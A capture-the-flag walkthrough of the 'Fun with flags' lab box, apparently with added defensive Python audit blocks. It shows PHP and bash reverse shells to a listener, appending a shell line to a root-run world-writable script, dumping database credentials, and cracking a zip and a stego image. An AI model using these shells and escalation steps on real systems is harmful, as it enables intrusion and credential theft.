TBBT: Fun with flags Walkthrough

TBBT: Funwithflags

Port Scanning

┌─[root@NITRO]─[~]
└──╼ #nmap -v -A -p- 192.168.1.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 02:06 IST
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :.....
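nmap's `http-robots.txt` script reports four disallowed entries, among them names like `/web_shell.php` and `/rootflag.txt`. The block below is an added example and not code from the walkthrough: a small robots.txt parser plus a check that flags entries whose names suggest content that should be protected by access control rather than by a crawler hint, because robots.txt is served to anyone who asks for it. The robots.txt body is constructed here from the four paths nmap listed (the page only shows nmap's summary line), and the keyword list is an assumption chosen for the example.

```python
import re

# Constructed sample: the four paths nmap reported, written out as a robots.txt body.
SAMPLE_ROBOTS = """\
# robots.txt as it might look on the target (constructed for this example)
User-agent: *
Disallow: /howard
Disallow: /web_shell.php
Disallow: /backdoor
Disallow: /rootflag.txt
"""

# Substrings that make a disallowed path worth a closer look (assumed list).
SENSITIVE_HINTS = ("shell", "backdoor", "flag", "admin", "backup", "config")


def parse_robots(text):
    """Return {user_agent: [disallowed paths]} for a robots.txt body.

    Comments (# ...) and blank lines are ignored, directive names are
    case-insensitive, consecutive User-agent lines share one rule group,
    and a Disallow with an empty value disallows nothing.
    """
    groups = {}
    current = []        # user-agents the following rules apply to
    rules_seen = False  # True once a rule has followed the current agents
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            if rules_seen:              # a new group starts
                current, rules_seen = [], False
            current.append(value)
            groups.setdefault(value, [])
        elif key in ("disallow", "allow"):
            rules_seen = True
            if key == "disallow" and value:
                for agent in current:
                    groups[agent].append(value)
    return groups


def sensitive_paths(groups):
    """Disallowed paths whose name hints at something that must not be
    reachable without authentication; listing them in robots.txt only
    advertises them."""
    found = set()
    for paths in groups.values():
        for path in paths:
            if any(hint in path.lower() for hint in SENSITIVE_HINTS):
                found.add(path)
    return sorted(found)


if __name__ == "__main__":
    groups = parse_robots(SAMPLE_ROBOTS)
    for agent, paths in groups.items():
        print(agent, paths)
    print("review:", sensitive_paths(groups))
```

Anything this check flags belongs behind authentication or a web-server deny rule, not behind a `Disallow:` line; the line can stay for crawlers, but it must not be the only thing keeping the path private.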
┌─[root@NITRO]─[~]
└──╼ #telnet 192.168.1.105 1337

Trying 192.168.1.105...
Connected to 192.168.1.105.
Escape character is '^]'.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Connection closed by foreign host.
http://funwithflags/
┌─[✗]─[root@NITRO]─[~]
└──╼ #dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 17 02:25:59 2020
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.105/ ----
...
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
+ http://192.168.1.105/robots.txt
...
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-admin/
...

WordPress Time

┌─[root@NITRO]─[~]
└──╼ #wpscan --url http://192.168.1.105/music/wordpress -e p
______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.7.8
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] reflex-gallery
| Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue Mar 17 02:37:06 2020
file:///root/reflex.html
http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
http://funwithflags/music/wordpress/wp-content/uploads/phhp.php
php -r '$sock=fsockopen("192.168.1.1",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 59998
bash: cannot set terminal process group (1153): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads$
www-data@tbbt:/var/ftp/pub/bernadette$ cat PENNY_README_ASAP.txt
cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.
www-data@tbbt:/var/ftp/pub/penny$ cat wifi_password.txt
cat wifi_password.txt
SHELDON DONT CHANGHE IT AGAIN OK!?!?!
THIS IS THE ONLY PASSWORD I CAN REMEMBER
wifipassword: pennyisafreeloader
www-data@tbbt:/home/amy$ strings secretdiary
strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
...
www-data@tbbt:/home/penny$ cat .FLAG.penny.txt
cat .FLAG.penny.txt
RkxBRy1wZW5ueXtkYWNlNTJiZGIyYTBiM2Y4OTlkZmIzNDIzYTk5MmIyNX0=
www-data@tbbt:/home/leonard$ ls -la
ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw------- 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r--r-- 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.1/4321 0>&1" >> thermostat_set_temp.sh
┌─[✗]─[root@NITRO]─[~]
└──╼ #nc -nlvp 4321
listening on [any] 4321 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 35304
bash: cannot set terminal process group (3409): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# whoami
whoami
root
root@tbbt:~#
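`thermostat_set_temp.sh` in /home/leonard is owned by root but mode 777, and a root shell comes back after one line is appended to it, so something running as root executes that file. The block below is an added audit example, not part of the original walkthrough: it walks a directory for regular files that are both world-writable and executable (the misconfiguration that made this step possible), and checks a script body for the two reverse-shell idioms that appear on this page (`/dev/tcp/` and `fsockopen(`). The demo builds its own temporary fixture with constructed file contents; only the file names mirror the listing above.

```python
import os
import stat
import tempfile

# The two idioms used on this page; a real deployment would carry a longer list.
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "fsockopen(")


def world_writable_executables(root_dir):
    """Return [(relative path, octal mode, owner uid)] for regular files under
    root_dir that are world-writable and have any execute bit set.

    A file in this state that a privileged job runs lets any local user
    choose what that job executes.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            executable = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
            if mode & stat.S_IWOTH and executable:
                hits.append((os.path.relpath(path, root_dir), oct(mode), st.st_uid))
    return sorted(hits)


def tampered_lines(script_text):
    """1-based line numbers of lines containing a known reverse-shell idiom."""
    return [
        number
        for number, line in enumerate(script_text.splitlines(), 1)
        if any(marker in line for marker in REVERSE_SHELL_MARKERS)
    ]


def demo():
    """Constructed fixture mirroring /home/leonard: a 777 script beside a
    normal 644 dotfile. Returns the audit result before and after the
    permission fix, and the tamper check on a clean and an appended script."""
    with tempfile.TemporaryDirectory() as home:
        script = os.path.join(home, "thermostat_set_temp.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n# placeholder body (constructed)\n")
        os.chmod(script, 0o777)
        dotfile = os.path.join(home, ".bashrc")
        open(dotfile, "w").close()
        os.chmod(dotfile, 0o644)

        before = world_writable_executables(home)
        os.chmod(script, 0o755)          # the fix: writable by the owner only
        after = world_writable_executables(home)

        with open(script) as fh:
            clean = tampered_lines(fh.read())
        # The line the walkthrough appended, used here as detection input.
        appended = "#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.1/4321 0>&1\n"
        tampered = tampered_lines(appended)
    return before, after, clean, tampered


if __name__ == "__main__":
    before, after, clean, tampered = demo()
    print("world-writable executables before fix:", before)
    print("after chmod 755:", after)
    print("suspicious lines in clean script:", clean)
    print("suspicious lines in appended script:", tampered)
```

Run the first function over /etc/cron.d, /etc/cron.*, and every path referenced from root's crontab; the directory holding a root-executed script should itself not be writable by other users, or a rename-and-replace achieves the same thing as an append.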
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!
root@tbbt:/var/www/html/private# cat db_config.php
cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';
root@tbbt:/var/www/html/music/wordpress# cat wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );
/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );
/** MySQL database password */
define( 'DB_PASSWORD', 'footprintsonthemoon1337' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...
root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
mysql -u bigpharmacorp -p
Enter password: weareevil
mysql> show databases
show databases
-> ;
;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bigpharmacorp |
+--------------------+
2 rows in set (0.00 sec)
mysql> use bigpharmacorp
use bigpharmacorp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bigpharmacorp |
+-------------------------+
| products |
| users |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from users
select * from users
-> ;
;
+----+------------+----------------------------------+------------+---------------------------------------------------+
| id | username | password | fname | description |
+----+------------+----------------------------------+------------+---------------------------------------------------+
| 1 | admin | 3fc0a7acf087f549ac2b266baf94b8b1 | josh | Dont mess with me |
| 2 | bobby | 8cb1fb4a98b9c43b7ef208d624718778 | bob | I like playing football. |
| 3 | penny69 | cafa13076bb64e7f8bd480060f6b2332 | penny | Hi I am Penny I am new here!! <3 |
| 4 | mitsos1981 | 05d51709b81b7e0f1a9b6b4b8273b217 | dimitris | Opa re malaka! |
| 5 | alicelove | e146ec4ce165061919f887b70f49bf4b | alice | Eat Pray Love |
| 6 | bernadette | dc5ab2b32d9d78045215922409541ed7 | bernadette | FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f} |
+----+------------+----------------------------------+------------+---------------------------------------------------+
6 rows in set (0.00 sec)
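The `password` column above holds 32-character hex digests, the length of an unsalted MD5 hash, so each value is a single lookup away from its plaintext and identical passwords share identical hashes. The block below is an added example in Python, not code from the walkthrough or from the box's application: a classifier that flags such columns during a database audit, beside the hardened form that stores a per-user salt and a salted PBKDF2-HMAC-SHA256 derivation from the standard library. The sample rows are constructed from three entries in the table; the `pbkdf2_sha256$iterations$salt$hash` storage layout is an assumption for this example.

```python
import hashlib
import hmac
import re
import secrets

# Constructed rows (id, username, stored value) taken from the users table above.
SAMPLE_ROWS = [
    (1, "admin", "3fc0a7acf087f549ac2b266baf94b8b1"),
    (3, "penny69", "cafa13076bb64e7f8bd480060f6b2332"),
    (6, "bernadette", "dc5ab2b32d9d78045215922409541ed7"),
]

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed for the example)


def classify_stored_password(value):
    """Rough classification of what a password column actually contains."""
    if not value:
        return "empty"
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "unsalted-32hex"   # MD5 length: no salt, no work factor
    if re.fullmatch(r"[0-9a-f]{40}", value):
        return "unsalted-40hex"   # SHA-1 length: same problem
    if value.startswith("pbkdf2_sha256$"):
        return "pbkdf2"
    return "unknown"


def audit(rows):
    """Map username -> classification so weak columns show up in one pass."""
    return {username: classify_stored_password(stored) for _id, username, stored in rows}


def hash_password(password, salt=None):
    """Derive a salted hash; a fresh random salt is drawn per user."""
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False            # legacy or malformed value: never accept
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, kind in audit(SAMPLE_ROWS).items():
        print(f"{user:12} {kind}")
    stored = hash_password("example-only")
    print(classify_stored_password(stored), verify_password("example-only", stored))
```

Migrating an existing table means rehashing each user's password at their next successful login (the plaintext is only available then) and refusing any row whose value still classifies as unsalted afterwards.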
FLAG-raz{40d17a74e28a62eac2df19e206f0987c}
┌─[root@NITRO]─[~]
└──╼ #fcrackzip -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip -u
PASSWORD FOUND!!!!: pw == astronaut
┌─[✗]─[root@NITRO]─[~]
└──╼ #unzip super_secret_nasa_stuff_here.zip
Archive: super_secret_nasa_stuff_here.zip
[super_secret_nasa_stuff_here.zip] marsroversketch.jpg password:
inflating: marsroversketch.jpg
┌─[✗]─[root@NITRO]─[~]
└──╼ #stegcracker marsroversketch.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)
Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyoumom
Tried 51221 passwords
Your file has been written to: marsroversketch.jpg.out
iloveyoumom
┌─[✗]─[root@NITRO]─[~]
└──╼ # file marsroversketch.jpg.out
marsroversketch.jpg.out: ASCII text
┌─[✗]─[root@NITRO]─[~]
└──╼ # cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}
